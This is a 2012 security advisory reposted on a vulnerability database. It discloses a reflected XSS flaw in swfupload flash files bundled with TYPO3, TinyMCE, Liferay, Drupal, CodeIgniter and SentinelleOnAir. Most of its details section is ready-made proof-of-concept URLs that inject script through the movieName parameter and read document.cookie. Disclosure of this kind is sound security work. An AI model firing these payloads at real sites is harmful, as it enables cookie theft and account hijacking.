Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28823
HistoryDec 10, 2012 - 12:00 a.m.

XSS vulnerability in swfupload in TYPO3 CMS, TinyMCE, Liferay Portal, Drupal, Codeigniter, SentinelleOnAir

2012-12-1000:00:00
vulners.com
19

Hello 3APA3A!

I will draw your attention to XSS vulnerability in other web applications with swfupload. This is finial advisory concerning different versions of this flash application. Earlier I've wrote about swfupload in Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available in many other web applications.

In previous letters I've wrote concerning web applications with swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash Player 8, 9 and 10). And now I'll write about web applications with swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and 11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir - among multiple web applications which are bundled with swfupload_f10.swf or swfupload_f11.swf.


Affected products:

Vulnerable are potentially all versions of SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir. There is no information that they have fixed this vulnerability in their software (at that this vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did the developers of XenForo), which could be used by all web developers, which were using swfupload.


Details:

XSS (WASC-08):

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides described earlier swfupload_f9.swf and swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f10.swf, besides described earlier swfupload_f9.swf and swfupload_f8.swf.

Swfupload for Drupal:

As it can be seen from the project http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload for Drupal. But exactly in this project there are no files. But they are in the project Respectiva (http://code.google.com/p/respectiva/), which is Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

This is concerning swfupload_f10.swf. And concerning swfupload_f11.swf, then in Google's index there is only one project - SentinelleOnAir, which contains swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua